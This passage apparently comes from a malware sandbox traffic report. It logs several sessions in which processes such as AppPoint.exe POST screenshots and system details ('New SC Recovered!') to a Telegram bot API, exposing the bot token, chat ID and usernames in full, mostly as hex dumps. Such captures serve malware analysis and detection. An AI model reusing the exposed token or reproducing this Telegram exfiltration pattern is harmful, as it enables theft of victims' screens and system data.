19-13-41.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUN2eBQwvxlZxcp81e7WESRqdzl6NGAAIuHQACuyoJUFVMZnTdyUN9AQAHbQADNgQ","file_unique_id":"AQADLh0AArsqCVBy","file_size":10562,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUN2eBQwvxlZxcp81e7WESRqdzl6NGAAIuHQACuyoJUFVMZnTdyUN9AQAHbQADNgQ","file_unique_id":"AQADLh0AArsqCVBy","file_size":10562,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFDdngUML8ZWcXKfNXu1hEkanc5ejRgACLh0AArsqCVBVTGZ03clDfTYE","file_unique_id":"AgADLh0AArsqCVA","file_size":57167},"caption":"New SC Recovered!\n\nTime: 02/07/2025 19:03:40\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49997	149.154.167.220	443	7512	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:55:55 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd49981eeebc2c Host: api.telegram.org Content-Length: 57790 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:55:56 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:55:56 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 39 39 38 31 65 65 65 62 63 32 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 39 39 38 31 65 65 65 62 63 32 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 31 30 2f 32 30 32 35 20 30 35 3a 34 39 3a 34 33 0a 55 73 65 72 Data Ascii: -----------------------------8dd49981eeebc2cContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd49981eeebc2cContent-Disposition: form-data; name="caption"New SC Recovered!Time: 02/10/2025 05:49:43User
2025-01-10 15:55:56 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:55:56 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:55:56 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:55:56 UTC	7651	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:55:56 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 39 39 38 31 65 65 65 62 63 32 63 2d 2d 0d 0a Data Ascii: -----------------------------8dd49981eeebc2c--
2025-01-10 15:55:56 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:55:56 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201784,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524556,"document":{"file_name":"user-642294 2025-02-10 05-59-45.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUOGeBQwxrhPgeH-w1FKA2yrtLGY0CAAIvHQACuyoJUL6eXYZisqnzAQAHbQADNgQ","file_unique_id":"AQADLx0AArsqCVBy","file_size":10562,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUOGeBQwxrhPgeH-w1FKA2yrtLGY0CAAIvHQACuyoJUL6eXYZisqnzAQAHbQADNgQ","file_unique_id":"AQADLx0AArsqCVBy","file_size":10562,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFDhngUMMa4T4Hh_sNRSgNsq7SxmNAgACLx0AArsqCVC-nl2GYrKp8zYE","file_unique_id":"AgADLx0AArsqCVA","file_size":57167},"caption":"New SC Recovered!\n\nTime: 02/10/2025 05:49:43\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49998	149.154.167.220	443	5464	C:\Users\user\Desktop\IUqsn1SBGy.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:55:57 UTC	238	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd4d89ba7fba6a Host: api.telegram.org Content-Length: 57790 Expect: 100-continue
2025-01-10 15:55:57 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:55:57 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 64 38 39 62 61 37 66 62 61 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 64 38 39 62 61 37 66 62 61 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 31 35 2f 32 30 32 35 20 30 36 3a 32 36 3a 34 36 0a 55 73 65 72 Data Ascii: -----------------------------8dd4d89ba7fba6aContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd4d89ba7fba6aContent-Disposition: form-data; name="caption"New SC Recovered!Time: 02/15/2025 06:26:46User
2025-01-10 15:55:57 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:55:57 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:55:57 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:55:57 UTC	7651	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:55:57 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 64 38 39 62 61 37 66 62 61 36 61 2d 2d 0d 0a Data Ascii: -----------------------------8dd4d89ba7fba6a--
2025-01-10 15:55:58 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:55:58 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201785,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524558,"document":{"file_name":"user-642294 2025-02-15 06-26-49.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUOWeBQw5c5ocXhQg8k1_r0Usd6BIrAAIwHQACuyoJULqVBOhCZ33lAQAHbQADNgQ","file_unique_id":"AQADMB0AArsqCVBy","file_size":10562,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUOWeBQw5c5ocXhQg8k1_r0Usd6BIrAAIwHQACuyoJULqVBOhCZ33lAQAHbQADNgQ","file_unique_id":"AQADMB0AArsqCVBy","file_size":10562,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFDlngUMOXOaHF4UIPJNf69FLHegSKwACMB0AArsqCVC6lQToQmd95TYE","file_unique_id":"AgADMB0AArsqCVA","file_size":57167},"caption":"New SC Recovered!\n\nTime: 02/15/2025 06:26:46\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49999	149.154.167.220	443	7724	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:56:00 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd4999ecacb492 Host: api.telegram.org Content-Length: 57790 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:56:00 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:56:00 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 39 39 39 65 63 61 63 62 34 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 39 39 39 65 63 61 63 62 34 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 31 30 2f 32 30 32 35 20 30 36 3a 30 32 3a 34 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd4999ecacb492Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd4999ecacb492Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/10/2025 06:02:40User
2025-01-10 15:56:00 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:56:00 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:56:00 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:56:00 UTC	7651	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:56:00 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 39 39 39 65 63 61 63 62 34 39 32 2d 2d 0d 0a Data Ascii: -----------------------------8dd4999ecacb492--
